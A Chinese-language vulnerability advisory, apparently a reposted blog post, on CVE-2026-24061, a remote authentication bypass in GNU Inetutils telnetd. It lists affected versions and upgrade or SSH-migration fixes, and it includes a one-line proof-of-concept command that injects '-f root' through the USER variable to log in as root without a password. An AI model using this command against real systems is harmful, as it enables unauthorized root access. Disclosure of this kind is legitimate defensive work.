文章总结： GNUInetutilstelnetd存在远程认证绕过高危漏洞CVE-2026-24061，影响1.9.3至2.7版本。攻击者通过特定参数无需密码即可获取root权限。建议立即升级至最新版本，或迁移至SSH并关闭Telnet服务以确保安全。 综合评分： 81 文章分类： 漏洞预警,漏洞POC,漏洞分析

【已复现】GNU Inetutils Telnetd 远程认证绕过漏洞 CVE-2026-24061

原创

小白爱学习Sec 小白爱学习Sec

小白爱学习Sec

2026年1月23日 12:00 上海

免责声明

本文旨在提供有关特定漏洞工具或安全风险的详细信息，以帮助安全研究人员、系统管理员和开发人员更好地理解和修复潜在的安全威胁，协助提高网络安全意识并推动技术进步，而非出于任何恶意目的。利用本文提到的漏洞信息或进行相关测试可能会违反法律法规或服务协议。作者不对读者基于本文内容而产生的任何行为或后果承担责任。如有任何侵权问题，请联系作者删除。

简单介绍

近日GNU Inetutils telnetd 被爆出存在高危漏洞（CVE-2026-24061），仅需要一个参数，即可以最高权限登录目标主机，漏洞利用极其简单。

漏洞POC

USER='-f root' telnet -a IP

影响范围

影响版本：1.9.3 <= GNU Inetutils <= 2.7

修复建议

• 彻底关闭 Telnet 服务，迁移至 SSH。Telnet 明文传输在现代网络环境中本身就是巨大的安全隐患。
• 升级 inetutils 包至最新修复版本，或使用不包含此漏洞的 telnetd 实现（如 netkit-telnetd）。
• 通过包管理器将GNU Inetutils升级为2.7以上版本

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：小白爱学习Sec 小白爱学习Sec 小白爱学习Sec《【已复现】GNU Inetutils Telnetd 远程认证绕过漏洞 CVE-2026-24061》